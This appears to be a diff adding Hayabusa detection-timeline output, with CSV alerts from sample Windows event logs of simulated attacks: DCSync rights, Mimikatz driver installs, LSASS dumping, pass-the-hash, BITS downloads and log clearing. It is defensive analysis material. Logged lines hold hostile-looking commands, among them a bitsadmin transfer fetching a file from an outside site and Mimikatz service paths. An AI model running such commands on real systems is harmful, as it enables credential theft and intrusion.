+2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx
+2021-02-23 07:18:08.605 +09:00,rootdc1.offsec.lan,5136,critical,Persis,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,../hayabusa-rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5136-Permission change on top root AD (DCsync).evtx
+2021-02-23 07:35:11.993 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx
+2021-02-23 07:35:20.786 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,../hayabusa-rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID5136-4662 AD object owner changed.evtx
+2021-02-23 07:57:19.435 +09:00,jump01.offsec.lan,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2004-Any any firewall rule created.evtx
+2021-02-23 08:07:20.794 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: bitsadmin /transfer hackingarticles https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg c:\ignite.png | Path: C:\Windows\System32\bitsadmin.exe | PID: 0x1e00 | User: admmig | LID: 0x92e21,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx
+2021-02-23 08:07:21.231 +09:00,jump01.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: hackingarticles | URL: https://www.ma-neobanque.com/wp-content/uploads/2020/11/carte-max-premium.jpg,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID3-59-60-BITS job created.evtx
+2021-02-23 08:08:02.534 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c30 | User: JUMP01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID4688-BITS transfer initiated.evtx
+2021-03-03 19:24:12.402 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,"Name: Microsoft Office Click-to-Run Service | Path: ""C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"" /service | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-03 19:33:48.102 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,"Name: Microsoft Search in Bing | Path: ""C:\Program Files (x86)\Microsoft\Microsoft Search in Bing\MicrosoftSearchInBing.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-16 03:49:21.017 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:49:23.184 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: ab170ec9.png | URL: https://i.imgur.com/IFpvPlt.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:52:31.347 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eBRSG.img?w=100&h=100&m=6&tilesize=medium&x=1788&y=885&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:52:33.804 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:53:18.009 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:53:51.796 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1eC0p1.img?w=100&h=100&m=6&tilesize=medium&x=1964&y=1240&ms-scale=100&ms-contrast=standard,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:53:52.751 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161390740451_Images/LiveTileImages/MediumAndLarge/Image2.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:54:15.647 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: efc1a28b.png | URL: https://i.imgur.com/IFpvPlt.png,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 03:55:38.049 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{259DDBBE-DDD3-4590-8A2C-60211631093C}-GoogleUpdateSetup.exe | URL: http://r5---sn-5hnedn7l.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe?cms_redirect=yes&mh=pH&mip=213.127.64.248&mm=28&mn=sn-5hnedn7l&ms=nvh&mt=1615834104&mv=m&mvi=5&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-16 04:01:32.985 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{F1502BD5-ADFF-4123-9C07-0E4B02FCB037}-89.0.4389.82_87.0.4280.66_chrome_updater.exe | URL: http://r1---sn-5hne6nlr.gvt1.com/edgedl/release2/chrome/AKGnpidu3x0C0gtuxw-XHRQ_89.0.4389.82/89.0.4389.82_87.0.4280.66_chrome_updater.exe?cms_redirect=yes&mh=rx&mip=213.127.64.248&mm=28&mn=sn-5hne6nlr&ms=nvh&mt=1615834584&mv=m&mvi=1&pl=17&shardbypass=yes,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2021-03-17 00:50:54.591 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: Npcap Packet Driver (NPCAP) | Path: \SystemRoot\system32\DRIVERS\npcap.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-26 06:56:19.530 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon filter add -p 80 | Path: C:\Windows\System32\PktMon.exe | PID: 0x16d0 | User: admin | LID: 0x977caa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
+2021-03-26 06:56:32.794 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon comp list | Path: C:\Windows\System32\PktMon.exe | PID: 0x2b0c | User: admin | LID: 0x977caa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
+2021-03-26 06:56:50.874 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stpop | Path: C:\Windows\System32\PktMon.exe | PID: 0x2bdc | User: admin | LID: 0x977caa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
+2021-03-26 06:56:53.090 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: pktmon stop | Path: C:\Windows\System32\PktMon.exe | PID: 0x1bc0 | User: admin | LID: 0x977caa,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
+2021-03-26 06:57:05.324 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: FX-BS7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
+2021-03-26 06:57:11.415 +09:00,FX-BS7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb60 | User: FX-BS7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1040-Traffic sniffing/ID-4688 Native Windows sniffer Pktmon usage.evtx
+2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account:  | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:12:22.200 +09:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx
+2021-03-27 01:12:22.201 +09:00,jump01.offsec.lan,13,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID13-New service for Mimikatz.evtx
+2021-03-27 01:17:29.210 +09:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
+2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,info,Persis,Service Installed,Name: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | Account:  | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,Svc: mimikatz driver (mimidrv) | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:17:35.489 +09:00,jump01.offsec.lan,7045,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-New service for Mimikatz +npcap.evtx
+2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,info,Persis,Service Installed,Name: mimidrv | Path: C:\TOOLS\Security_tool\Mimikatz-fev-2020\mimidrv.sys | User: admmig | SrvAccount: LocalSystem | SrvType: 0x1 | SrvStartType: 2 | LID: 0xcc3c3,../hayabusa-rules/hayabusa/default/events/Security/4697_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
+2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
+2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,high,CredAccess | Exec,Credential Dumping Tools Service Execution,,../hayabusa-rules/sigma/builtin/security/win_security_mal_creddumper.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
+2021-03-27 01:17:35.490 +09:00,jump01.offsec.lan,4697,critical,LatMov | CredAccess,Mimikatz Use,,../hayabusa-rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4697-New service for Mimikatz.evtx
+2021-03-27 01:36:00.106 +09:00,jump01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4658,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,../hayabusa-rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:36:00.829 +09:00,jump01.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,../hayabusa-rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656-4663-4658 Mimikatz sekurlsa password dump.evtx
+2021-03-27 01:59:24.880 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx
+2021-03-27 01:59:24.892 +09:00,rootdc1.offsec.lan,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4661-4658 Mimikatz sekurlsa password dump SAM.evtx
+2021-03-27 05:41:38.966 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx
+2021-03-27 05:41:39.009 +09:00,rootdc1.offsec.lan,4742,high,CredAccess,Possible DC Shadow,,../hayabusa-rules/sigma/builtin/security/win_possible_dc_shadow.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4742-SPN set on computer account (DCshadow).evtx
+2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x76073 | PID: 7280 | PGUID: 747F3D96-3A77-607F-0000-00105DD17600",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:32:55.368 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:00.296 +09:00,MSEDGEWIN10,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:00.305 +09:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,../hayabusa-rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:00.306 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\samir | Process: System | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:00.384 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\user03 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile | LID: 0x770575 | PID: 2740 | PGUID: 747F3D96-3A7C-607F-0000-001058067700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2532 | PGUID: 747F3D96-04C3-607F-0000-0010F13B1E00,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,../hayabusa-rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:01.944 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49925 (MSEDGEWIN10) | Dst: 127.0.0.1:445 (MSEDGEWIN10) | User:  | Process: <unknown process> | PID: 4 | PGUID: 747F3D96-82A8-607F-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 4912 | PGUID: 747F3D96-3A89-607F-0000-001028587700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:13.741 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: ? | LID: 0x3e5 | PID: 5280 | PGUID: 747F3D96-3A8A-607F-0000-0010E4717700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,low,Evas,Windows Processes Suspicious Parent Directory,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
+2021-04-21 05:33:14.273 +09:00,MSEDGEWIN10,1,high,Evas,Suspicious Svchost Process,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/ImpersonateUser-via local Pass The Hash Sysmon and Security.evtx
